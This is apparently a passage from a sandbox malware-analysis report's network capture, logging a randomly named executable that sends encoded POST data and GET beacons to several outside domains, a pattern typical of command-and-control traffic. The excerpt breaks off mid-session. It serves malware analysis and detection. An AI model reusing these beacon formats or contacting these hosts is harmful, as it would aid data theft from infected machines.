                                                        Data Raw: 32 38 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 20 63 6f 6c 6f 72 3a 20 23 32 32 32 3b 20 66 6f 6e 74 3a 20 31 36 70 78 2f 31 2e 35 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 22 53 65 67 6f 65 20 55 49 22 2c 20 52 6f 62 6f 74 6f 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 41 72 69 61 6c 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 6d 61 72 67 69 6e 3a 20 30
                                                        Data Ascii: 285<!DOCTYPE html><html> <head> <meta charset="UTF-8" /> <meta name="robots" content="noindex,nofollow" /> <style> body { background-color: #fff; color: #222; font: 16px/1.5 -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, "Helvetica Neue", Arial, sans-serif; margin: 0
                                                        Nov 4, 2024 10:11:42.714816093 CET336INData Raw: 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 20 6d 61 72 67 69 6e 3a 20 33 30 70 78 3b 20 6d 61 78 2d 77 69 64 74 68 3a 20 36 30 30 70 78 3b 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                                        Data Ascii: ; } .container { margin: 30px; max-width: 600px; } h1 { color: #dc3545; font-size: 24px; }</style> </head> <body> <div class="container"> <h1>Sorry, the page y


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.45000876.223.67.189805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:11:47.778816938 CET756OUTPOST /vzdg/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.mjmegartravel.online
                                                        Origin: http://www.mjmegartravel.online
                                                        Content-Length: 200
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.mjmegartravel.online/vzdg/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 48 47 55 67 4d 65 61 64 39 47 48 43 63 59 41 41 35 54 74 4b 6b 70 4b 6f 45 47 58 4f 38 58 67 43 7a 45 69 46 59 53 79 4e 66 74 77 52 34 4a 52 36 2b 57 58 50 4b 43 48 7a 2b 6d 6f 5a 53 67 74 72 79 49 69 72 46 69 72 52 58 4f 6a 59 42 30 79 69 72 56 63 31 55 47 2f 79 32 77 38 39 6d 4b 41 33 4c 74 7a 51 72 54 53 48 70 66 78 66 73 30 46 31 31 4e 44 58 2b 38 64 36 77 58 49 76 6c 63 4a 63 6c 73 71 79 4a 49 4f 62 66 56 68 56 34 72 49 45 6e 2f 6f 74 36 63 70 6d 63 32 42 55 53 63 7a 52 63 79 69 47 4b 4c 6d 6f 71 69 73 54 43 66 55 54 78 75 6f 63 77 36 6d 55 66 6c 38 41 52 2f 73 65 54 41 3d 3d
                                                        Data Ascii: Q8r=HGUgMead9GHCcYAA5TtKkpKoEGXO8XgCzEiFYSyNftwR4JR6+WXPKCHz+moZSgtryIirFirRXOjYB0yirVc1UG/y2w89mKA3LtzQrTSHpfxfs0F11NDX+8d6wXIvlcJclsqyJIObfVhV4rIEn/ot6cpmc2BUSczRcyiGKLmoqisTCfUTxuocw6mUfl8AR/seTA==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.45001676.223.67.189805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:11:50.496211052 CET776OUTPOST /vzdg/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.mjmegartravel.online
                                                        Origin: http://www.mjmegartravel.online
                                                        Content-Length: 220
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.mjmegartravel.online/vzdg/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 48 47 55 67 4d 65 61 64 39 47 48 43 64 34 51 41 71 67 31 4b 31 35 4b 76 42 47 58 4f 32 33 68 4c 7a 45 75 46 59 54 32 64 66 62 67 52 37 6f 68 36 73 48 58 50 4a 43 48 7a 6e 57 6f 6d 66 41 74 65 79 49 76 57 46 6d 33 52 58 4b 4c 59 42 77 69 69 73 6d 45 30 47 47 2f 30 37 51 38 2f 6c 36 41 33 4c 74 7a 51 72 54 32 39 70 66 70 66 73 46 56 31 30 73 44 55 32 63 64 31 35 33 49 76 68 63 4a 59 6c 73 71 41 4a 4a 43 39 66 51 39 56 34 75 73 45 6d 74 41 73 7a 63 70 67 42 6d 41 49 43 73 7a 61 53 52 50 32 44 70 71 73 33 6a 6b 78 44 5a 5a 4a 67 66 4a 4c 69 36 43 6e 43 69 31 30 63 38 52 58 49 4d 66 35 63 66 43 42 76 61 53 6d 5a 50 65 7a 6b 4b 65 57 6e 31 6b 3d
                                                        Data Ascii: Q8r=HGUgMead9GHCd4QAqg1K15KvBGXO23hLzEuFYT2dfbgR7oh6sHXPJCHznWomfAteyIvWFm3RXKLYBwiismE0GG/07Q8/l6A3LtzQrT29pfpfsFV10sDU2cd153IvhcJYlsqAJJC9fQ9V4usEmtAszcpgBmAICszaSRP2Dpqs3jkxDZZJgfJLi6CnCi10c8RXIMf5cfCBvaSmZPezkKeWn1k=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.45001776.223.67.189805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:11:53.069380045 CET10858OUTPOST /vzdg/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.mjmegartravel.online
                                                        Origin: http://www.mjmegartravel.online
                                                        Content-Length: 10300
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.mjmegartravel.online/vzdg/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 48 47 55 67 4d 65 61 64 39 47 48 43 64 34 51 41 71 67 31 4b 31 35 4b 76 42 47 58 4f 32 33 68 4c 7a 45 75 46 59 54 32 64 66 62 6f 52 34 65 56 36 2b 30 76 50 49 43 48 7a 34 6d 6f 64 66 41 74 48 79 49 33 53 46 6d 37 6e 58 4d 50 59 41 58 4b 69 74 58 45 30 4d 47 2f 30 6b 41 38 38 6d 4b 42 74 4c 74 6a 55 72 54 6d 39 70 66 70 66 73 47 39 31 33 39 44 55 30 63 64 36 77 58 49 4b 6c 63 4a 67 6c 73 79 51 4a 4a 48 41 66 6b 78 56 34 4f 38 45 67 59 63 73 78 38 70 69 43 6d 41 41 43 73 2b 43 53 51 69 50 44 6f 65 47 33 6a 67 78 42 2b 45 57 6c 64 35 74 38 4b 4b 36 62 46 4a 32 63 66 6f 56 47 72 58 75 54 75 61 65 77 62 32 54 58 2b 2b 39 30 36 4b 75 37 6a 42 72 6d 68 6a 75 36 35 5a 4e 63 5a 69 6f 78 6d 6b 59 4a 53 49 62 4c 41 31 41 64 4a 32 77 2b 65 78 33 79 4d 50 67 6a 44 67 31 69 59 44 57 46 58 69 75 4e 49 71 46 4c 54 39 71 76 34 4b 42 4f 62 57 2f 4b 4b 72 56 72 4a 35 2b 59 54 71 72 4d 47 7a 69 4c 57 7a 6d 4a 53 49 32 4c 6e 49 6f 75 55 75 77 6b 2b 65 74 7a 30 54 45 6b 45 70 65 2b 36 69 51 4e 62 44 61 6e 46 [TRUNCATED]
                                                        Data Ascii: Q8r=HGUgMead9GHCd4QAqg1K15KvBGXO23hLzEuFYT2dfboR4eV6+0vPICHz4modfAtHyI3SFm7nXMPYAXKitXE0MG/0kA88mKBtLtjUrTm9pfpfsG9139DU0cd6wXIKlcJglsyQJJHAfkxV4O8EgYcsx8piCmAACs+CSQiPDoeG3jgxB+EWld5t8KK6bFJ2cfoVGrXuTuaewb2TX++906Ku7jBrmhju65ZNcZioxmkYJSIbLA1AdJ2w+ex3yMPgjDg1iYDWFXiuNIqFLT9qv4KBObW/KKrVrJ5+YTqrMGziLWzmJSI2LnIouUuwk+etz0TEkEpe+6iQNbDanFNF0fUOVjFeyLZXrZ34Hpn3a1LxSzO5K9oNsUB/Un1lwVNqKGkL9J4icQXUPtRipUxJCFmQ5cv43L8xnNRAxQZeLxPOAyOtUwFvm42yla0AJdKMiL+3k0Imi20bGhakAG1Plq4a+gY1QnvVSq99xpQRXtjY6LJ1X1WcH98JSmyCYlIKZ1JgIFGM0mfQjxktrun9UtjKUkd1nESTBuBIx41iFlvExjfH2VlvwstnhZx5lyy1nJgcLOCNhDIfUxPt3toDdTpueyOV35+VhB+0k4DSdkGu9faudJx/PXvzY1c2Q4sr2drZPjwG0etBvpMOCF2jbSwn8AbpdQSbrnO+2FOa70x1AFqo5sgGJZ9/SQG/u43G4UbAHCoJeAkG9iD7QG7smEVb/Cn76hcnmhLs4srewzoz9hQYyZVPlGXK3MdJb+2vjm/tiV9/93QbjFrcndmWmkl0aXooRFDPHd3O4SuR5HgqC+hK2DyQu/UyHIrJXK1AGqHnyx0eVklyvkzCq+Q2oW3SivG9NsAdWDpeK/3vkX4sa2yVlimINJp7ZmIURkf86ANRbfWF78RP8Rh+S2I3ynYJIMC0dJ/FUCMMyhV+n1Vc2ZcJMpuU+zMYLbC1IS1mxTxZQjeJvlk7jDjF2K5fz80mJSiZtxEuXjvlE9n23Z6HzBeeKIdJ [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.45001876.223.67.189805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:11:55.611392975 CET472OUTGET /vzdg/?Q8r=KE8APriLyHXVd58o2RVaxaHXOxKH6DBplwKhZxuWS8ol8ZNB+zrcGju15mUNFjZ4/qmrZG+pRN3cP3bWpxBJDHDy3g5/i7RwSLvxhij0g+QyzFB905H5wec=&6trpq=anQT3n HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Host: www.mjmegartravel.online
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Nov 4, 2024 10:11:56.260510921 CET392INHTTP/1.1 200 OK
                                                        Server: openresty
                                                        Date: Mon, 04 Nov 2024 09:11:56 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 252
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 38 72 3d 4b 45 38 41 50 72 69 4c 79 48 58 56 64 35 38 6f 32 52 56 61 78 61 48 58 4f 78 4b 48 36 44 42 70 6c 77 4b 68 5a 78 75 57 53 38 6f 6c 38 5a 4e 42 2b 7a 72 63 47 6a 75 31 35 6d 55 4e 46 6a 5a 34 2f 71 6d 72 5a 47 2b 70 52 4e 33 63 50 33 62 57 70 78 42 4a 44 48 44 79 33 67 35 2f 69 37 52 77 53 4c 76 78 68 69 6a 30 67 2b 51 79 7a 46 42 39 30 35 48 35 77 65 63 3d 26 36 74 72 70 71 3d 61 6e 51 54 33 6e 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Q8r=KE8APriLyHXVd58o2RVaxaHXOxKH6DBplwKhZxuWS8ol8ZNB+zrcGju15mUNFjZ4/qmrZG+pRN3cP3bWpxBJDHDy3g5/i7RwSLvxhij0g+QyzFB905H5wec=&6trpq=anQT3n"}</script></head></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.4500193.33.130.190805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:12:01.315690041 CET741OUTPOST /87jo/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.energyparks.net
                                                        Origin: http://www.energyparks.net
                                                        Content-Length: 200
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.energyparks.net/87jo/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 6c 78 61 4d 41 72 6a 47 79 76 64 6a 46 43 6d 33 4b 78 61 57 56 6d 76 36 67 7a 6b 34 61 4d 73 4c 34 4f 76 41 46 30 45 56 30 67 69 66 32 41 33 2f 50 59 54 33 53 4c 31 6f 37 66 69 4d 64 44 78 55 4c 4e 54 54 63 66 42 65 4e 35 51 61 6d 78 30 5a 49 64 78 56 48 65 58 71 57 49 4e 43 74 52 56 42 36 64 66 73 4e 2f 54 70 59 77 4f 53 7a 59 6d 39 59 56 41 31 54 76 52 6c 39 36 77 6e 71 4b 58 68 35 33 47 33 4f 5a 59 35 5a 58 46 34 70 4a 5a 4e 74 31 5a 4b 30 71 61 34 43 43 62 5a 4a 50 31 53 41 70 45 2f 72 47 38 4a 56 79 2b 59 42 46 58 63 51 6c 52 34 2b 68 39 46 6b 2b 6d 44 74 78 44 5a 6c 51 3d 3d
                                                        Data Ascii: Q8r=lxaMArjGyvdjFCm3KxaWVmv6gzk4aMsL4OvAF0EV0gif2A3/PYT3SL1o7fiMdDxULNTTcfBeN5Qamx0ZIdxVHeXqWINCtRVB6dfsN/TpYwOSzYm9YVA1TvRl96wnqKXh53G3OZY5ZXF4pJZNt1ZK0qa4CCbZJP1SApE/rG8JVy+YBFXcQlR4+h9Fk+mDtxDZlQ==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.4500203.33.130.190805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:12:03.863682985 CET761OUTPOST /87jo/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.energyparks.net
                                                        Origin: http://www.energyparks.net
                                                        Content-Length: 220
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.energyparks.net/87jo/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 6c 78 61 4d 41 72 6a 47 79 76 64 6a 47 68 2b 33 5a 47 75 57 64 6d 76 31 73 54 6b 34 51 73 73 50 34 4f 6a 41 46 78 68 4b 30 54 47 66 32 68 48 2f 65 73 50 33 52 4c 31 6f 30 2f 69 55 53 6a 77 59 4c 4e 50 78 63 65 39 65 4e 35 45 61 6d 77 45 5a 4a 71 6c 57 56 2b 58 6f 65 6f 4e 41 79 42 56 42 36 64 66 73 4e 2f 48 54 59 30 69 53 7a 6f 32 39 65 78 55 32 64 50 51 58 73 36 77 6e 67 71 58 6c 35 33 47 56 4f 59 56 57 5a 56 74 34 70 4c 42 4e 73 6b 5a 4e 36 71 61 32 63 79 61 75 50 4d 59 4d 45 4d 4a 50 31 51 77 41 4b 32 79 33 45 44 61 47 42 55 77 76 73 68 5a 32 35 35 76 33 67 79 2b 51 2b 55 6f 6a 72 47 52 51 69 44 6b 67 6d 4f 6f 42 4c 39 37 31 78 4a 4d 3d
                                                        Data Ascii: Q8r=lxaMArjGyvdjGh+3ZGuWdmv1sTk4QssP4OjAFxhK0TGf2hH/esP3RL1o0/iUSjwYLNPxce9eN5EamwEZJqlWV+XoeoNAyBVB6dfsN/HTY0iSzo29exU2dPQXs6wngqXl53GVOYVWZVt4pLBNskZN6qa2cyauPMYMEMJP1QwAK2y3EDaGBUwvshZ255v3gy+Q+UojrGRQiDkgmOoBL971xJM=


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.4500213.33.130.190805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:12:06.411699057 CET10843OUTPOST /87jo/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.energyparks.net
                                                        Origin: http://www.energyparks.net
                                                        Content-Length: 10300
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.energyparks.net/87jo/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 6c 78 61 4d 41 72 6a 47 79 76 64 6a 47 68 2b 33 5a 47 75 57 64 6d 76 31 73 54 6b 34 51 73 73 50 34 4f 6a 41 46 78 68 4b 30 54 4f 66 78 53 50 2f 4d 39 50 33 51 4c 31 6f 35 66 69 41 53 6a 77 56 4c 4e 48 31 63 65 77 6c 4e 36 38 61 67 69 38 5a 63 75 4a 57 4d 4f 58 6f 53 49 4e 46 74 52 55 62 36 64 50 6f 4e 2f 58 54 59 30 69 53 7a 75 36 39 65 6c 41 32 4e 2f 52 6c 39 36 77 72 71 4b 58 64 35 33 75 2f 4f 59 42 38 5a 6b 4e 34 73 62 52 4e 75 57 68 4e 32 71 62 51 64 79 61 32 50 4d 55 74 45 4d 38 32 31 51 73 35 4b 78 36 33 49 6c 2f 35 53 56 4d 52 6f 68 51 6b 68 35 6e 31 67 54 65 46 77 6b 41 33 71 48 39 70 78 6e 34 56 6a 2b 52 73 62 65 76 70 76 76 2b 68 56 47 67 32 62 31 4c 6d 32 39 54 57 38 4a 69 39 2f 63 69 4d 44 66 45 4a 42 65 79 48 4d 4b 58 4a 4c 78 46 73 74 6f 75 5a 72 38 74 55 4f 39 59 47 35 2b 48 35 73 57 71 4d 58 38 46 73 45 43 70 2f 78 31 38 42 74 71 33 4f 68 67 47 6b 51 51 77 33 35 57 44 67 4d 35 35 65 56 67 79 74 35 53 46 4f 4f 55 32 4c 39 44 59 77 36 33 72 4b 32 70 78 70 45 75 33 58 38 5a [TRUNCATED]
                                                        Data Ascii: Q8r=lxaMArjGyvdjGh+3ZGuWdmv1sTk4QssP4OjAFxhK0TOfxSP/M9P3QL1o5fiASjwVLNH1cewlN68agi8ZcuJWMOXoSINFtRUb6dPoN/XTY0iSzu69elA2N/Rl96wrqKXd53u/OYB8ZkN4sbRNuWhN2qbQdya2PMUtEM821Qs5Kx63Il/5SVMRohQkh5n1gTeFwkA3qH9pxn4Vj+Rsbevpvv+hVGg2b1Lm29TW8Ji9/ciMDfEJBeyHMKXJLxFstouZr8tUO9YG5+H5sWqMX8FsECp/x18Btq3OhgGkQQw35WDgM55eVgyt5SFOOU2L9DYw63rK2pxpEu3X8Zq9675vD6cQ8XjxYp5RzY/mKvs9uSHlpqpY2g6445OgoX7Xkm2GhbH0LzXNu16TYJLPQo4SC58PHo0PqBhPkC0wUjl/h5nNFCP0XqKMUCvmTSh5wLxA37dZP9yhrKX2pIYEB5IUpBFxRiH1GjxWwzIXBPKAohMLqhFafyqWFrkeHhQ63jtmnALqpBN28j2tubRcam9npE1P+8dEm2NgTDgLSa0sOH1E0vKVORSTO1hBKsj5nHja2ImF1NUvCc7SQsBTMMybH+uclmxV90LPtkM9cYxRYZbAiCLzrIKNCxSxRHmcXQeEbvjP05YJOR0X1Ew6XKYqRXLiXuBl1yvNck459xug2WH0jNUzMBARvcmqxLOWBzzfE5D17s23qOWzlNaEL6udr6neCzYT3CfqmhuFUoeb80tP6qyX9a3I71M1RFFhAq4fi8v0eQmJHJjah3yVnxo5Ru0U16JSIkSBZH/nW4iMrlrTYqtz4el3VNDK6IdHhHWjn9DkAWPI1gHxSxlqI1cmUXsJayIegzZ0uCeTAokIfymKgdDtuBc/2xJ6RYJLKWq0PftTcWiRlN3lGOb1D42iYG/ONSJDSPc7WsroFSiNH2rNmEBGOglNck66ex1k1tBVe7MdF9DWWqiWrv11KqQLRpa7jofV+fLnnPQMaisW1DpUNqme [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.4500223.33.130.190805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:12:08.952990055 CET467OUTGET /87jo/?Q8r=ozysDd3vwv9gaS29FRbnc0GmlFkZcaQYkpXnKEUw0wCH0hn9MIemfLYf1abLLDUSAte8bdVQTpE72RtdL6FpCvjERq56vwlcganuPeakPXnenu2oXl0fStc=&6trpq=anQT3n HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Host: www.energyparks.net
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Nov 4, 2024 10:12:10.520934105 CET392INHTTP/1.1 200 OK
                                                        Server: openresty
                                                        Date: Mon, 04 Nov 2024 09:12:10 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 252
                                                        Connection: close
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 51 38 72 3d 6f 7a 79 73 44 64 33 76 77 76 39 67 61 53 32 39 46 52 62 6e 63 30 47 6d 6c 46 6b 5a 63 61 51 59 6b 70 58 6e 4b 45 55 77 30 77 43 48 30 68 6e 39 4d 49 65 6d 66 4c 59 66 31 61 62 4c 4c 44 55 53 41 74 65 38 62 64 56 51 54 70 45 37 32 52 74 64 4c 36 46 70 43 76 6a 45 52 71 35 36 76 77 6c 63 67 61 6e 75 50 65 61 6b 50 58 6e 65 6e 75 32 6f 58 6c 30 66 53 74 63 3d 26 36 74 72 70 71 3d 61 6e 51 54 33 6e 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?Q8r=ozysDd3vwv9gaS29FRbnc0GmlFkZcaQYkpXnKEUw0wCH0hn9MIemfLYf1abLLDUSAte8bdVQTpE72RtdL6FpCvjERq56vwlcganuPeakPXnenu2oXl0fStc=&6trpq=anQT3n"}</script></head></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        21192.168.2.45002384.32.84.32805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:12:15.617593050 CET744OUTPOST /3ase/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.electronify.shop
                                                        Origin: http://www.electronify.shop
                                                        Content-Length: 200
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.electronify.shop/3ase/
                                                        User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_5) AppleWebKit/600.4.10 (KHTML, like Gecko) Version/6.2.4 Safari/537.85.13
                                                        Data Raw: 51 38 72 3d 53 33 64 47 6b 45 74 73 4f 79 56 2b 35 65 53 4c 73 37 36 4e 4e 4e 54 4f 72 39 7a 35 4e 34 61 38 34 31 4a 51 32 6c 71 42 4c 6c 57 6e 5a 77 31 47 54 58 43 6d 45 72 53 34 68 70 59 39 71 74 6b 38 50 66 58 44 2b 77 4c 59 47 36 62 71 5a 50 71 49 41 4b 55 33 63 51 68 42 33 42 70 31 55 56 4a 45 73 35 78 67 4d 44 76 71 4c 4c 49 77 74 4f 63 36 4d 32 5a 71 42 50 50 48 34 7a 66 70 5a 77 78 7a 77 69 58 76 71 59 7a 6f 76 45 69 4c 45 63 69 6c 4c 4e 42 68 73 43 75 39 50 53 63 66 70 4c 61 37 2f 47 72 57 37 68 49 65 7a 35 6a 51 64 58 6e 6a 49 41 42 37 2f 47 43 31 2b 4f 70 4c 41 32 50 77 67 77 3d 3d
                                                        Data Ascii: Q8r=S3dGkEtsOyV+5eSLs76NNNTOr9z5N4a841JQ2lqBLlWnZw1GTXCmErS4hpY9qtk8PfXD+wLYG6bqZPqIAKU3cQhB3Bp1UVJEs5xgMDvqLLIwtOc6M2ZqBPPH4zfpZwxzwiXvqYzovEiLEcilLNBhsCu9PScfpLa7/GrW7hIez5jQdXnjIAB7/GC1+OpLA2Pwgw==


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        22192.168.2.45002484.32.84.32805332C:\Program Files (x86)\QuCzRTpwvkRfrnWTklrageHpGOfzjBVivdoJGWvwW\PMZSowQBcVJqD.exe
                                                        TimestampBytes transferredDirectionData
                                                        Nov 4, 2024 10:12:18.158333063 CET764OUTPOST /3ase/ HTTP/1.1
                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                        Accept-Language: en-US,en;q=0.5
                                                        Accept-Encoding: gzip, deflate, br
                                                        Host: www.electronify.shop
                                                        Origin: http://www.electronify.shop
                                                        Content-Length: 220
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Cache-Control: max-age=0
                                                        Referer: http://www.electronify.shop/3ase/
